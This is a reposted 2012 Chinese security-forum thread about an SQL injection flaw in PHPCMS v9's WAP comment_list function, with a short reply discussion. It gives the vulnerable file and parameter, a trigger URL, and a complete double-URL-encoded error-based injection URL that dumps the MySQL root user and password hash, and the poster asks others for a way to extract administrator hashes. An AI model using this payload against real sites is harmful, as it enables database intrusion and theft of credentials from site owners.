- A+
显示不全请点击全屏阅读
云缺陷编号:WooYun-2012-11818
文件位置:/phpcms/modules/wap/index.php
漏洞函数:comment_list()
未过滤参数:$_GET[‘commentid’]
触发条件:开启WAP模块
触发漏洞:index.php?m=wap&c=index&a=comment_list&commentid=content_12%2527-84-1
由于下划线在此变量会被用于分割,因此构造注入条件比较困难(v9的表里有下划线,当select * from v9_admin时,下划线被当做分割,因此v9_admin就会被分开成v9与admin两个表。)
讨论下爆出管理员hash的EXP或者不鸡肋的利用方法。想了许久不知如何突破下划线的问题。
我先抛砖引玉(爆出mysql的root密码EXP,前提当然是有权限访问mysql表):
http://www.xxoo.cn/index.php?m=wap&c=index&a=comment_list&commentid=content_12%2527%2520and%2520%2528select%25201%2520from%2528select%2520count%2528%252a%2529%252Cconcat%2528%2528select%2520%2528select%2520concat%2528user%252C0x3a%252Cpassword%252C0x3a%2529%2529%2520from%2520mysql.user%2520limit%25200%252C1%2529%252Cfloor%2528rand%25280%2529%252a2%2529%2529x%2520from%2520mysql.user%2520group%2520by%2520x%2529a%2529%2520and%2520%2527x%2527%253D%2527x-1-1
3 个回复
回复此人 感谢
笔墨 (这世界笑了,于是你合群的一起笑了.) | 2012-10-19 08:17
不知道base64可行不。。。
B1n4ry (苦逼的生存着。。。) | 2012-10-19 08:27
@笔墨 此处Base64不行的,这是经过两次urlencode编码。
xsser (十根阳具有长短!!) | 2012-10-19 11:37
表示很困难
原文地址:http://zone.wooyun.org/content/1357
Tags:
如果您喜欢我的博客,欢迎点击图片定订阅到邮箱 也可以点击链接【订阅到鲜果】
如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡